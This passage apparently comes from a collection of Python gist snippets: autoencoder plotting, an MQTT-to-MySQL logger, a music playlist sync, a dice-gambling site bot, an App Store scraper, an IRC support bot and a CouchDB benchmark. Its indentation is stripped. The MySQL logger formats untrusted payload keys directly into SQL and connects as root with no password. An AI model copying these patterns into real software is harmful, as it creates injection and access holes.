gs1 = gridspec.GridSpec(5, 2)
gs1.update(wspace=0.0, hspace=0.0) # set the spacing between axes.
for i in range(5):
test = vx[random.randint(0, len(vx))]
test = np.array([test[j] if u > salt_pepper else np.random.choice([0, 1]) for u, j in zip(np.random.uniform(size = n_input), range(n_input))])
plt.subplot(gs1[2*i])
plt.axis('off')
plt.imshow(test.reshape((28, 28)), cmap = cm.Greys_r)
plt.subplot(gs1[2*i + 1])
plt.axis('off')
plt.imshow(test_input(test).reshape((28, 28)), cmap = cm.Greys_r)
plt.show()
# Now let's visualize the learned manifold
# We only need the decoder for this (and some way to generate latent variables)
t = T.vector()
h = T.tanh(T.dot(t, bernoulli_Wh) + bernoulli_bh)
yt = T.nnet.sigmoid(T.dot(h, bernoulli_Wo) + bernoulli_bo)
visualize = theano.function([t], yt,
mode='FAST_RUN',
allow_input_downcast=True)
# Size of visualizations
size = 10
# For 2 latent variables the manifold can be fully explored on a grid
plt.figure(figsize = (size, size))
gs1 = gridspec.GridSpec(size, size)
gs1.update(wspace=0.0, hspace=0.0) # set the spacing between axes.
ppf = np.linspace(1E-3, 1.0 - 1E-3, size)
if n_latent == 2:
for i in range(size):
for j in range(size):
plt.subplot(gs1[size*i + j])
plt.axis('off')
image = 1.0 - visualize([norm.ppf(ppf[i]), norm.ppf(ppf[j])])
plt.imshow(image.reshape((28, 28)), cmap = cm.Greys_r)
plt.show()
# For any number of latent variables you can sample them and generate fake data
plt.figure(figsize = (size, size))
gs1 = gridspec.GridSpec(size, size)
gs1.update(wspace=0.0, hspace=0.0) # set the spacing between axes.
for i in range(size):
for j in range(size):
plt.subplot(gs1[size*i + j])
plt.axis('off')
image = 1.0 - visualize(np.random.normal(0, 1.0, size = n_latent))
plt.imshow(image.reshape((28, 28)), cmap = cm.Greys_r)
plt.show()
print("--- %s seconds ---" % (time.time() - start_time))
```
#### File: hard-gists/6532185/snippet.py
```python
import MySQLdb
import mosquitto
import json
import time
#mosquitto broker config
broker = 'mqtt.localdomain'
broker_port = 1883
broker_topic = '/test/location/#'
#broker_clientid = 'mqttuide2mysqlScript'
#mysql config
mysql_server = 'thebeast.localdomain'
mysql_username = 'root'
mysql_passwd = ''
mysql_db = 'mqtt'
#change table below.
# Open database connection
db = MySQLdb.connect(mysql_server, mysql_username, mysql_passwd, mysql_db)
# prepare a cursor object using cursor() method
cursor = db.cursor()
def on_connect(mosq, obj, rc):
print("rc: "+str(rc))
def on_message(mosq, obj, msg):
print(msg.topic+" "+str(msg.qos)+" "+str(msg.payload))
vars_to_sql = []
keys_to_sql = []
list = []
list = json.loads(msg.payload)
for key,value in list.iteritems():
print ("")
print key, value
if key == 'tst':
print "time found"
print value
value = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(float(value)))
print value
value_type = type(value)
if value_type is not dict:
print "value_type is not dict"
if value_type is unicode:
print "value_type is unicode"
vars_to_sql.append(value.encode('ascii', 'ignore'))
keys_to_sql.append(key.encode('ascii', 'ignore'))
else:
print "value_type is not unicode"
vars_to_sql.append(value)
keys_to_sql.append(key)
#add the msg.topic to the list as well
print "topic", msg.topic
addtopic = 'topic'
vars_to_sql.append(msg.topic.encode('ascii', 'ignore'))
keys_to_sql.append(addtopic.encode('ascii', 'ignore'))
keys_to_sql = ', '.join(keys_to_sql)
try:
# Execute the SQL command
# change locations to the table you are using
queryText = "INSERT INTO locations(%s) VALUES %r"
queryArgs = (keys_to_sql, tuple(vars_to_sql))
cursor.execute(queryText % queryArgs)
print('Successfully Added record to mysql')
db.commit()
except MySQLdb.Error, e:
try:
print "MySQL Error [%d]: %s" % (e.args[0], e.args[1])
except IndexError:
print "MySQL Error: %s" % str(e)
# Rollback in case there is any error
db.rollback()
print('ERROR adding record to MYSQL')
def on_publish(mosq, obj, mid):
print("mid: "+str(mid))
def on_subscribe(mosq, obj, mid, granted_qos):
print("Subscribed: "+str(mid)+" "+str(granted_qos))
def on_log(mosq, obj, level, string):
print(string)
# If you want to use a specific client id, use
#mqttc = mosquitto.Mosquitto(broker_clientid)
# but note that the client id must be unique on the broker. Leaving the client
# id parameter empty will generate a random id for you.
mqttc = mosquitto.Mosquitto()
mqttc.on_message = on_message
mqttc.on_connect = on_connect
mqttc.on_publish = on_publish
mqttc.on_subscribe = on_subscribe
# Uncomment to enable debug messages
mqttc.on_log = on_log
mqttc.connect(broker, broker_port, 60)
mqttc.subscribe(broker_topic, 0)
rc = 0
while rc == 0:
rc = mqttc.loop()
print("rc: "+str(rc))
# disconnect from server
print ('Disconnected, done.')
db.close()
```
#### File: hard-gists/6572592/snippet.py
```python
import urllib, urllib2
import gmusicapi
from xml.etree.ElementTree import *
def main():
# Gather required info.
google_username = raw_input("Google username: ").strip()
google_password = raw_input("Google password: ")
lastfm_username = raw_input("Lastfm username: ").strip()
lastfm_key = raw_input("Lastfm API key: ").strip()
# Log in.
api = gmusicapi.Mobileclient()
if not api.login(google_username, google_password, gmusicapi.Mobileclient.FROM_MAC_ADDRESS):
print "Login error"
return
# Get loved tracks.
loved = []
page = 1
while True:
url = "http://ws.audioscrobbler.com/2.0/?method=user.getlovedtracks&user=%s&api_key=%s&page=%d" % \
(lastfm_username, lastfm_key, page)
print("Fetching: " + url)
tree = parse(urllib2.urlopen(url)).getroot()
tracks = tree.findall('lovedtracks/track')
for track in tracks:
title = track.find('name').text
artist = track.find('artist/name').text
loved.append((artist,title))
if len(tracks) < 50:
break
page += 1
print("Got " + str(len(loved)) + " loved tracks")
if len(loved) == 0:
print "Exiting"
return
# Creating new playlist
playlist_id = api.create_playlist("Loved tracks")
to_add = []
# Search for each song in all access.
# This is quite a dirty way to do it, and the gmusicapi seems to be a little out of date
# hence the catch-all. This found 529 out of the 787 loved songs I have which is not too bad.
for target in loved:
try:
res = api.search_all_access(target[0] + " " + target[1], max_results=1)
to_add.append(res["song_hits"][0]["track"]["nid"])
except:
pass
print("Got " + str(len(to_add)) + " songs so far out of " + str(len(loved)))
print("Adding " + str(len(to_add)) + " songs to playlist")
api.add_songs_to_playlist(playlist_id, to_add)
print("Done! I hope.")
if __name__ == '__main__':
main()
```
#### File: hard-gists/6581415/snippet.py
```python
import datetime
import json
import gtk
import gobject
# TODO: fix gi.repository.WebKit to have a working webview.get_dom_document
import webkit
# This is a module providing direct python bindings into JavaScriptCore.
# http://packages.linuxdeepin.com/deepin/pool/main/p/python-javascriptcore/python-javascriptcore_0.0003-deepin1_amd64.deb
import javascriptcore
# This is another JavaScriptCore library. It doesn't support python callbacks.
# import jswebkit as javascriptcore
import pymongo
class WebView(webkit.WebView):
"""
Manage the actual webpage and the interface to the webpage here.
"""
__gsignals__ = {
"started": (gobject.SIGNAL_RUN_FIRST,
gobject.TYPE_NONE,
(gobject.TYPE_OBJECT,),
)
}
def __init__(self, browser):
super(WebView, self).__init__()
# keep a reference to the parent object
self._browser = browser
self.results = []
self.resultcounter = 0
self.last_balance = 0
self.last_invested = 0
self.settings = self.get_settings()
self.settings.set_property("enable-java-applet", False)
self.settings.set_property("enable-plugins", False)
self.settings.set_property("enable-scripts", True)
self.settings.set_property("enable-file-access-from-file-uris", True)
self.settings.set_property("enable-private-browsing", False)
self.settings.set_property("enable-spell-checking", False)
self.settings.set_property("enable-universal-access-from-file-uris", True)
self.settings.set_property("enable-dns-prefetching", True)
self.settings.set_property("enable-webaudio", True)
self.settings.set_property("enable-webgl", True)
self.settings.set_property("enable-fullscreen", True)
self.settings.set_property("enable-xss-auditor", False)
self.settings.set_property("javascript-can-open-windows-automatically", False)
self.settings.set_property("user-agent", Browser.user_agent)
#self.set_full_content_zoom(True)
self.set_border_width(0)
self.set_custom_encoding('UTF-8')
self.set_double_buffered(True)
self.set_transparent(True)
self.set_editable(False)
#self.set_view_mode(False)
self.set_view_source_mode(False)
self.console_response = self.connect('console-message', self.on_console_message)
self.connect('notify::load-status', self._on_load_status)
# HACK to get JSGlobalContextRef
#self.connect("window-object-cleared", self.on_window_object_cleared)
#self.connect('load-finished', self.on_load_finished)
self.connect("document-load-finished", self.on_load_finished)
def _on_load_status(self, view, browser):
if view.get_property('load-status') == webkit.LOAD_FINISHED:
print ('* Browser load finished')
# This needs to run with a timeout because otherwise the
# status is emited before the offscreen image is finished.
# GObject.timeout_add(100, lambda: self.emit("render-finished"))
elif view.get_property('load-status') == webkit.LOAD_FAILED:
print ('* Browser load failed')
elif view.get_property('load-status') == webkit.LOAD_COMMITTED:
print ('* Browser load commited')
elif view.get_property('load-status') == webkit.LOAD_PROVISIONAL:
print ('* Browser load provisional')
elif view.get_property('load-status') == webkit.LOAD_FIRST_VISUALLY_NON_EMPTY_LAYOUT:
print ('* Browser load provisional')
def on_load_finished(self, browser, web_frame):
print ('=> event load finished ') #, browser, web_frame
print ('Provisonal data source:', web_frame.get_provisional_data_source())
print ('Title:', web_frame.get_title())
print ('URI:', web_frame.get_uri())
# add a chat message to the message box (does not send network packets)
# js.globalObject.socket.listeners("chat").values()[0]("hi world", "500")
# js.globalObject.socket.emit("chat", js.globalObject.csrf, "hello cruel world")
self.setup_js()
print "on_load_finished returning early for testing purposes"
return
# let's setup the callbacks
self.element_bankroll = self.js.globalObject.document.getElementsByClassName("bankroll").values()[0]
def on_updated_bankroll(whatever):
self.invested = self.element_bankroll.innerText
#print "invested: " + str(self.invested)
self.element_bankroll.addEventListener("DOMSubtreeModified", on_updated_bankroll)
self.element_investment_profit = self.js.globalObject.document.getElementsByClassName("sprofitpct").values()[0]
def on_updated_investment_profit(whatever):
self.investment_profit = self.element_investment_profit.innerText
#print "investment profit: " + str(self.investment_profit)
self.element_investment_profit.addEventListener("DOMSubtreeModified", on_updated_investment_profit)
def on_updated_investment(whatever):
self.invested = float(self.element_invested.innerText)
self.element_invested = self.js.globalObject.document.getElementsByClassName("investment").values()[0]
self.element_invested.addEventListener("DOMSubtreeModified", on_updated_investment)
def on_updated_balance(whatever):
self.balance = float(self.element_balance.value)
self.element_balance = self.js.globalObject.document.getElementById("pct_balance")
self.element_balance.addEventListener("DOMSubtreeModified", on_updated_balance)
def on_result(data):
"""
Bet result data.
"""
data = dict(data.items())
data["stats"] = dict(data["stats"].items())
self._browser.mongo_collection.insert(data)
if len(self.results) > 1000:
del self.results[0]
self.results.append(data)
self.resultcounter += 1
self.jscallbacks.on_result = on_result
self.js.evaluateScript("var on_result = function(data) { return jscallbacks.on_result(data); };")
self.js.evaluateScript("socket.on('result', on_result);")
#self.js.globalObject.socket.on("result", self.jscallbacks.on_result)
# remove the default listener for "timeout"
self.js.globalObject.socket.removeAllListeners("timeout")
def on_connection_timeout():
"""
The webpage eventually disconnects you.
"""
print "reconnecting at " + str(datetime.datetime.now())
self.js.evaluateScript("socket.emit('reconnect', csrf);")
self.jscallbacks.on_connection_timeout = on_connection_timeout
self.js.evaluateScript("var on_connection_timeout = function() { return jscallbacks.on_connection_timeout(); };")
self.js.evaluateScript("socket.on('timeout', on_connection_timeout);")
def on_console_message(self, *args):
(view, message, line, file) = args
print ('browser: ' + str(message) + ' in file: ' + str(file) + ' line:' + str(line))
self.stop_emission('console-message')
def invest(self):
print "investing: " + str(self.balance)
self.last_invested = self.balance
self.js.evaluateScript("socket.emit('invest', csrf, document.getElementById('pct_balance').value);")
def divest(self):
print "divesting: " + str(self.invested)
print "investment was: " + str(self.last_invested)
print "difference is: " + str(self.invested - self.last_invested)
self.element_invested = self.js.globalObject.document.getElementsByClassName("investment").values()[0]
self.js.evaluateScript("socket.emit('divest', csrf, document.getElementByClassName('investment')[0].innerText);")
@property
def profit(self):
return self.invested - self.last_invested
def login(self, username, password):
"""
Send a login signal to the site. This is problematic because it causes
the page to refresh. Why not just send the cookie the first time?
"""
self.js.globalObject.socket.emit("login", self.js.globalObject.csrf, username, password)
def setup_js(self):
"""
Setup the javascript bindings.
"""
context = self.get_main_frame().get_global_context()
# self._js = jswebkit.JSContext(context)
self._js = javascriptcore.JSContext(context)
self.document = self._js.evaluateScript("document")
# setup a JSObject to attach python callbacks to
self.jscallbacks = self._js.evaluateScript("var jscallbacks = {}; jscallbacks")
def example(text):
return text
self.jscallbacks.example = example
# js.evaluateScript("jscallbacks.example('500');")
return self._js
@property
def js(self):
if not hasattr(self, "_js"):
self.setup_js()
return self._js
class Browser(object):
"""
This is the main core of the application. Connects to just-dice.com and
starts monitoring all data events.
"""
default_width = 320
default_height = 240
user_agent = "NSA"
def __init__(self):
self.mongo_client = pymongo.MongoClient()
self.mongo_db = self.mongo_client.db_justdice
self.mongo_collection = self.mongo_db.collection_justdice
self.window = gtk.Window(type=gtk.WINDOW_TOPLEVEL)
self.window.set_position(gtk.WIN_POS_CENTER)
self.window.set_default_size(Browser.default_width, Browser.default_height)
self.window.connect("destroy", self.on_quit)
#self.vbox = Gtk.VBox()
self.webview = WebView(self)
self.scrolled_window = gtk.ScrolledWindow()
self.scrolled_window.add(self.webview)
self.window.add(self.scrolled_window)
self.window.show_all()
#self.webview.load_string(init_string, "text/html", "utf-8", "#")
#doc = self.webview.get_dom_document()
# open the main site
self.webview.open("https://just-dice.com/")
#self.webview.open("http://diyhpl.us/~bryan/debug.html")
def on_quit(self, widget):
gtk.main_quit()
if __name__ == "__main__":
browser = Browser()
from IPython.lib.inputhook import enable_gtk
enable_gtk()
# Main loop has been replaced by gtk.main() in __main__
#mainloop = GLib.MainLoop()
#mainloop.run()
#mainloop.quit()
#gtk.main()
```
#### File: hard-gists/6606487/snippet.py
```python
import pickle
from datetime import datetime
import urllib.request
from bs4 import BeautifulSoup
import re
import string
import json
import codecs
def loadState():
try:
state_file = open( "itunes_store_state_dump.pba", "rb" )
apps_discovered = pickle.load( state_file )
apps_pending = pickle.load( state_file )
state_file.close()
print( "Pending = ", len( apps_pending ), " Discovered = ", len( apps_discovered ) )
return apps_discovered, apps_pending
except IOError:
print( "A fresh start ..." )
return [], []
character_encoding = 'utf-8'
apps_discovered, apps_pending = loadState()
count_offset = len( apps_discovered )
apps_categories = {}
start_time = datetime.now()
def getPageAsSoup( url ):
try:
response = urllib.request.urlopen( url )
except urllib.error.HTTPError as e:
print( "HTTPError with: ", url, e )
return None
the_page = response.read()
soup = BeautifulSoup( the_page )
return soup
def reportProgress():
current_time = datetime.now()
elapsed = current_time - start_time
v = ( ( len( apps_discovered ) - count_offset ) / elapsed.seconds ) * 60
t = len( apps_pending ) / v if v > 0 else 0
print( "Pending = ", len( apps_pending ), " Discovered = ", len( apps_discovered ), " Velocity = ", str( v ), " parsed per min and Time remaining in min = ", str( t ) )
print( json.dumps( apps_categories ) )
def saveState():
state_file = open( "itunes_store_state_dump.pba", "wb" )
pickle.dump( apps_discovered, state_file )
pickle.dump( apps_pending, state_file )
state_file.close()
reportProgress()
def getApps( categoryUrl ):
previous_apps = []
start_idx = 1
while( True ):
url = categoryUrl + "&page=" + str( start_idx )
print( url )
categoryPage = getPageAsSoup( url )
allAppLinks = [aDiv.get( 'href' ) for aDiv in categoryPage.findAll( 'a', href = re.compile( '^https://itunes.apple.com/us/app' ) )]
if allAppLinks == previous_apps: break
apps_pending.extend( [appLink for appLink in allAppLinks if appLink not in apps_pending] )
previous_apps = allAppLinks
start_idx += 1
saveState()
def getAppDetails( appUrl ):
if appUrl in apps_discovered: return None
soup = getPageAsSoup( appUrl )
if not soup: return None
pTitleDiv = soup.find( 'p', {'class' : 'title'} )
if pTitleDiv and pTitleDiv.getText() == 'One Moment Please.': return None
appDetails = {}
appDetails['app_url'] = appUrl
titleDiv = soup.find( 'div', {'id' : 'title'} )
appDetails['title'] = titleDiv.find( 'h1' ).getText()
appDetails['developer'] = titleDiv.find( 'h2' ).getText()
detailsDiv = soup.find( 'div', {'id' : 'left-stack'} )
if not detailsDiv: return None
priceDiv = detailsDiv.find( 'div', {'class' : 'price'} )
if priceDiv: appDetails['price'] = priceDiv.getText()
categoryDiv = detailsDiv.find( 'li', {'class' : 'genre'} )
if categoryDiv: appDetails['category'] = categoryDiv.find( 'a' ).getText()
releaseDateDiv = detailsDiv.find( 'li', {'class' : 'release-date'} )
if releaseDateDiv: appDetails['release_date'] = releaseDateDiv.getText()
languageDiv = detailsDiv.find( 'li', {'class' : 'language'} )
if languageDiv: appDetails['language'] = languageDiv.getText().split()
contentRatingDiv = detailsDiv.find( 'div', {'class' : 'app-rating'} )
if contentRatingDiv: appDetails['content_rating'] = contentRatingDiv.getText()
contentRatingReasonDiv = detailsDiv.find( 'list app-rating-reasons' )
if contentRatingReasonDiv: appDetails['content_rating_reason'] = [li.getText() for li in contentRatingReasonDiv.findAll( 'li' )]
compatibilityDiv = detailsDiv.find( 'p' )
if compatibilityDiv: appDetails['compatibility'] = compatibilityDiv.getText()
customerRatingDivs = detailsDiv.findAll( 'div', {'class' : 'rating', 'role': 'img'} )
if customerRatingDivs:
customerRating = customerRatingDivs[-1].get( 'aria-label' ).split( ',' )
appDetails['rating'] = customerRating[0].strip()
appDetails['reviewers'] = customerRating[1].strip()
appLinksDiv = soup.find( 'div', {'class' : 'app-links'} )
if appLinksDiv:
for link in appLinksDiv.findAll( 'a', {'class' : 'see-all'} ):
text = link.getText()
href = link.get( 'href' )
if text.endswith( 'Web Site' ): appDetails['developer_wesite'] = href
elif text.endswith( 'Support' ): appDetails['support'] = href
elif text.endswith( 'Agreement' ): appDetails['license'] = href
apps_discovered.append( appUrl )
return appDetails
def closeFileHandlers( fileHandlers ):
for v in fileHandlers.values():
v.close()
if __name__ == '__main__':
itunesStoreUrl = 'https://itunes.apple.com/us/genre/ios/id36?mt=8'
mainPage = getPageAsSoup( itunesStoreUrl )
allCategories = []
for column in ['list column first', 'list column', 'list column last']:
columnDiv = mainPage.find( 'ul', {'class' : column} )
allCategories.extend( aDiv.get( 'href' ) for aDiv in columnDiv.findAll( 'a', href = re.compile( '^https://itunes.apple.com/us/genre' ) ) )
for category, alphabet in [( x, y ) for x in allCategories for y in string.ascii_uppercase]:
getApps( category + '&letter=' + alphabet )
fileHandlers = {}
count = 100
while apps_pending:
if count == 0:
saveState()
count = 100
count = count - 1
app = apps_pending.pop()
if not app: continue
try:
app_data = getAppDetails( app )
except Exception as e:
print( app, e )
exit( 1 )
if not app_data:
continue
if not app_data['category']: app_data['category'] = 'uncategorized'
if app_data['category'].lower() not in fileHandlers:
fileHandlers[app_data['category'].lower()] = codecs.open( '_'.join( ["apple_appstore", app_data['category'].lower()] ), 'ab', character_encoding, buffering = 0 )
apps_categories[app_data['category'].lower()] = 0
apps_categories[app_data['category'].lower()] = apps_categories[app_data['category'].lower()] + 1
fileHandler = fileHandlers[app_data['category'].lower()]
try:
fileHandler.write( json.dumps( app_data ) + "\n" )
except Exception as e:
print( e )
saveState()
closeFileHandlers( fileHandlers )
```
#### File: hard-gists/6623972/snippet.py
```python
import argparse
from subprocess import Popen
import i3
PARSER = argparse.ArgumentParser(prog='focus_win')
PARSER.add_argument('-n', '--number',
required=True,
type=int,
choices=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9],
help='Window number (limited to [0,9]).')
def focus_nth_window(nth):
''' Roughly focus the nth window in the hierarchy (limited to 10 first) '''
wins = get_windows_from_current_workspace()
if nth == 0:
nth = 10
cmd = 'i3-msg [con_id={0}] focus'.format(wins[nth-1])
Popen(cmd, shell=True)
def get_windows_from_current_workspace():
res = []
ws = get_current_workspace()
workspace = i3.filter(name=ws)
if workspace:
workspace = workspace[0]
windows = i3.filter(workspace, nodes=[])
for window in windows:
res.append(window['id'])
return res
def get_current_workspace():
''' Returns the current workspace '''
workspaces = i3.msg('get_workspaces')
workspace = i3.filter(tree=workspaces, focused=True)
if workspace:
return workspace[0]['name']
return ''
if __name__ == '__main__':
args = PARSER.parse_args()
focus_nth_window(args.number)
```
#### File: hard-gists/6719172/snippet.py
```python
import willie.module
import re
import datetime
STATUS_OK = 0
STATUS_WAITING = 1
STATUS_IDLE = 2
available_supporters = {}
open_tickets = {}
closed_tickets = 0
next_ticket = 0
class config:
"""
A simple struct for providing the options of this module.
Contains default values as static attributes.
"""
channel = '#callcenter'
supporters = []
ticket_idle = 30 # ticket is idle after 30 seconds
ticket_timeout = 300 # ticket times out after 5 minutes
supporter_idle = 120 # supporter is idle after 2 minutes
supporter_timeout = 600 # supporter times out after 10 minutes
supporter_askifaliveinterval = 30 # asks idle supporters if they are still alive every 30 seconds
msg_no_supporter = 'We are sorry but there are no supporters online. We will notify you when someone is here!'
msg_invalid_ticket = 'Sorry, you have no valid support ticket. Please start a new direct support session!'
msg_idle_closed = "We closed your support ticket because you didn't say anything for a while."
msg_after_support = "We hope we were able to help you! :-)"
msg_supporter_available = "A supporter is now available!"
pass
class Ticket:
def __init__(self, nickname, language):
self.nickname = nickname
self.language = language
self.lasttime = datetime.datetime.now()
self.status = STATUS_OK
def touch(self):
"""
Markiert dieses Ticket als aktiv und setzt die Zeit zurück
"""
self.lasttime = datetime.datetime.now()
self.status = STATUS_OK
def is_with(self, nickname):
return self.nickname.lower() == nickname.lower()
@staticmethod
def by_nick(nick):
global open_tickets
for k in open_tickets:
if open_tickets[k].is_with(nick):
return k
return None
def get_idletime(self):
"""
Returns since how many seconds this ticket is idle.
"""
return (datetime.datetime.now() - self.lasttime).total_seconds()
class OnlineSupporter:
def __init__(self, nickname):
self.nickname = nickname
self.lasttime = datetime.datetime.now()
self.lastaskalivetime = 0
def touch(self):
self.lasttime = datetime.datetime.now()
def get_idletime(self):
return (datetime.datetime.now() - self.lasttime).total_seconds()
def may_askifalive(self):
return (datetime.datetime.now() - self.lastaskalivetime).total_seconds() >= config.supporter_askifaliveinterval;
def open_ticket(nick):
global next_ticket
ticket = next_ticket
open_tickets[ticket] = Ticket(nick[0], nick[1])
next_ticket += 1
return ticket;
def close_ticket(ticket, is_done=True):
if ticket in open_tickets:
open_tickets.pop(ticket)
if is_done:
global closed_tickets
closed_tickets += 1
return True
else:
return False
def get_nick_by_ticket(ticket):
if ticket in open_tickets:
return open_tickets[ticket].nickname
else:
return None
def get_ticket_stats():
return mirc_format("^B^K07%d^R tickets open (^B^K14+%d^R idle), ^B^K10%d^R tickets done" % (
sum(open_tickets[s].status == STATUS_OK for s in open_tickets),
sum(open_tickets[s].status == STATUS_IDLE for s in open_tickets),
closed_tickets))
@willie.module.event('PRIVMSG')
@willie.module.rule('.*')
def forward(bot, trigger):
if trigger.sender == trigger.nick:
# Es ist eine Query, weil Quelle==Nickname statt Quelle==Channelname
ticket = Ticket.by_nick(trigger.nick);
if ticket != None:
bot.msg(config.channel, mirc_format("^K4%s ^K4,15#%d^K^K4:^K %s" % (str(trigger.nick), ticket, trigger.bytes)))
open_tickets[ticket].touch()
else:
m = re.match(r"HELP:(.+);(.*)", trigger.bytes)
if (m):
ticket = open_ticket((trigger.nick, m.groups(1)))
bot.msg(config.channel, mirc_format("^K4New ticket: ^K4,15#%d^K^K4 (%s, %s)" % (ticket, trigger.nick, m.group(1))))
if len(available_supporters) == 0:
open_tickets[ticket].status = STATUS_WAITING;
bot.msg(trigger.nick, config.msg_no_supporter)
else:
bot.msg(trigger.nick, config.msg_invalid_ticket)
elif trigger.sender == config.channel and trigger.nick.lower() in config.supporters:
# Es ist eine Nachricht im Support-Channel. Cool!
# Lebenszeichen des Supporters eintragen
m = re.match(r"(\d+) (.*)$", trigger.bytes)
if m:
supporter_as_online(bot, trigger.nick)
target = get_nick_by_ticket(int(m.group(1)))
if target is not None:
bot.msg(target, m.group(2))
if available_supporters.has_key(trigger.nick.lower()):
if available_supporters[trigger.nick.lower()].get_idletime() > config.supporter_idle:
bot.write(('NOTICE', trigger.nick), "Hey %s, glad you're still here!" % trigger.nick)
bot.msg(config.channel, get_ticket_stats())
available_supporters[trigger.nick.lower()].touch()
@willie.module.commands('stats')
def show_stats(bot, trigger):
bot.msg(config.channel, get_ticket_stats())
@willie.module.rule(r'(?i)done (\d+)$')
@willie.module.commands('done')
def mark_ticket_done(bot, trigger):
if trigger.sender == config.channel and trigger.nick.lower() in config.supporters:
supporter_as_online(bot, trigger.nick)
ticket = int(trigger.group(2))
target = get_nick_by_ticket(ticket)
if close_ticket(ticket):
bot.msg(config.channel, get_ticket_stats())
bot.msg(target, config.msg_after_support);
def supporter_as_online(bot, nick):
"""
Marks a supporter as online
"""
if nick.lower() in config.supporters and not nick.lower() in available_supporters:
available_supporters[nick.lower()] = OnlineSupporter(nick)
bot.msg(config.channel, "%s just logged in!" % nick)
for k in open_tickets.copy():
if open_tickets[k].status == STATUS_WAITING:
bot.msg(open_tickets[k].nickname, config.msg_supporter_available)
open_tickets[k].touch()
bot.msg(config.channel, get_ticket_stats())
@willie.module.commands('me')
def supporter_joins(bot, trigger):
if trigger.group(2) == 'on':
supporter_as_online(bot, trigger.nick)
elif trigger.group(2) == 'off':
if supporter_quit(trigger.nick):
bot.msg(config.channel, "Allright %s, you've done enough for today!" % trigger.nick)
def supporter_quit(nick):
"""
Removes a supporter from the list of available supporters.
Returns false if that supporter was not on the list.
"""
if available_supporters.has_key(nick.lower()):
available_supporters.pop(nick.lower())
return True
return False
@willie.module.interval(10)
def check_heartbeat(bot):
# I. Um abwesende Supporter kuemmern
for k in available_supporters.copy():
if available_supporters[k].get_idletime() > config.supporter_timeout:
if supporter_quit(k):
bot.msg(config.channel, '%s is not available for support anymore.' % k)
elif available_supporters[k].get_idletime() > config.supporter_idle and available_supporters[k].may_askifalive:
bot.write(('NOTICE', k), '%s, are you still alive?' % k)
available_supporters[k].lastaskalivetime = datetime.datetime.now()
# II. Um abwesende Tickets kuemmern
for k in open_tickets.copy():
if open_tickets[k].get_idletime() > config.ticket_timeout:
bot.msg(open_tickets[k].nickname, config.msg_idle_closed)
if close_ticket(k, False):
bot.msg(config.channel, "Closed idle ticket #%d." % k)
elif open_tickets[k].get_idletime() > config.ticket_idle:
open_tickets[k].status = STATUS_IDLE
def setup(bot):
for attr, value in config.__dict__.iteritems():
if not attr.startswith('__'):
if bot.config.has_option('supportbot', attr):
valueToUse = getattr(bot.config.supportbot, attr);
print type(value)
if isinstance(value, int):
valueToUse = int(valueToUse)
elif isinstance(value, list):
valueToUse = valueToUse.lower().split(',')
setattr(config, attr, valueToUse)
else:
bot.debug('SupportCenter', '%s is missing, will use "%s"' % (attr, value), 'warning')
def configure(botconfig):
if botconfig.option("Configure the Support Center"):
botconfig.add_section('supportbot')
botconfig.interactive_add('supportbot', 'channel', 'In which channel will the supporters work? (The bot must be in that channel!)', config.channel)
botconfig.add_list('supportbot', 'supporters', 'Enter all supporters!', 'Nickname:')
botconfig.interactive_add('supportbot', 'ticket_idle', 'After how many seconds should a ticket be marked as inactive?', config.ticket_idle)
botconfig.interactive_add('supportbot', 'ticket_timeout', 'After how many seconds of inactivity should a ticket be deleted?', config.ticket_timeout)
botconfig.interactive_add('supportbot', 'supporter_idle', 'After how many seconds should a supporter be asked if he is alive?', config.supporter_idle)
botconfig.interactive_add('supportbot', 'supporter_timeout', 'After how many seconds of inactivity should a supporter be marked as offline?', config.supporter_timeout)
botconfig.interactive_add('supportbot', 'supporter_askifaliveinterval', 'How often should an idle supporter be asked if he is alive? (Interval in seconds)', config.supporter_askifaliveinterval)
def mirc_format(s):
"""
Replaces mIRC-Codes (for example ^K for Strg+K for colors) with the corresponding chars
"""
s = s.replace("^B", chr(0x02))
s = s.replace("^K", chr(0x03))
s = s.replace("^R", chr(0x0f))
return s;
```
#### File: hard-gists/672229/snippet.py
```python
from datetime import datetime
# See https://gist.github.com/672279/
from inoi.util.random import sequential_id, monotonic_id
import httplib2
import json
import random
import time
import sys
import uuid
id_makers = {
'random': lambda: uuid.uuid4().hex,
'monotonic': monotonic_id,
'sequential': sequential_id,
}
database = sys.argv[1]
make_id = id_makers[sys.argv[2]]
baseurl = 'http://localhost:5984/%s' % database
bulk_size = 2000
total_docs = 2000000
http = httplib2.Http()
def send_bulk(bulk):
resp, content = http.request(
baseurl + '/_bulk_docs',
method='POST',
body=json.dumps({'docs': bulk}),
)
def make_bulk(size):
return [
{
'_id': make_id(),
'timestamp': datetime.now().isoformat(),
'data': random.random() * 2000,
}
for i in xrange(size)
]
def main():
max_bulk_rate = (-1, float('-inf'))
min_bulk_rate = (-1, float('inf'))
loop = 0
def print_stats():
end = time.time()
total_rate = (loop * bulk_size) / (end - start)
print '== loop %d ============================' % loop
print 'peak min: in loop %d, %.2f docs/sec' % min_bulk_rate
print 'peak max: in loop %d, %.2f docs/sec' % max_bulk_rate
print 'current: %.2f docs/sec' % bulk_rate
print 'total: %.2f docs/sec' % total_rate
start = time.time()
while True:
loop += 1
bulk_start = time.time()
bulk = make_bulk(bulk_size)
send_bulk(bulk)
bulk_end = time.time()
bulk_rate = bulk_size / (bulk_end - bulk_start)
if bulk_rate > max_bulk_rate[1]:
max_bulk_rate = (loop, bulk_rate)
if bulk_rate < min_bulk_rate[1]:
min_bulk_rate = (loop, bulk_rate)
if loop % 20 == 0:
print_stats()
if loop * bulk_size >= total_docs:
break
print ''
print 'FINISHED:'
print_stats()
if __name__ == '__main__':
main()
# python couchdb_test.py test_sequential_id sequential
#
# FINISHED:
# == loop 1000 ============================
# peak min: in loop 5, 3057.95 docs/sec
# peak max: in loop 8, 7904.39 docs/sec
# current: 7449.51 docs/sec
# total: 7294.78 docs/sec
#
# database size on disk: 648548454 bytes = 0.6 GB
# python couchdb_test.py test_monotonic_id monotonic
#
# FINISHED:
# == loop 1000 ============================
# peak min: in loop 195, 1911.73 docs/sec
# peak max: in loop 161, 7703.18 docs/sec
# current: 7511.34 docs/sec
# total: 7353.81 docs/sec
#
# database size on disk: 611405926 = 0.6 GB
# python couchdb_test.py test_random_id random
#
# FINISHED:
# == loop 1000 ============================
# peak min: in loop 889, 535.66 docs/sec
# peak max: in loop 1, 5473.21 docs/sec
# current: 1685.13 docs/sec
# total: 2133.34 docs/sec
#
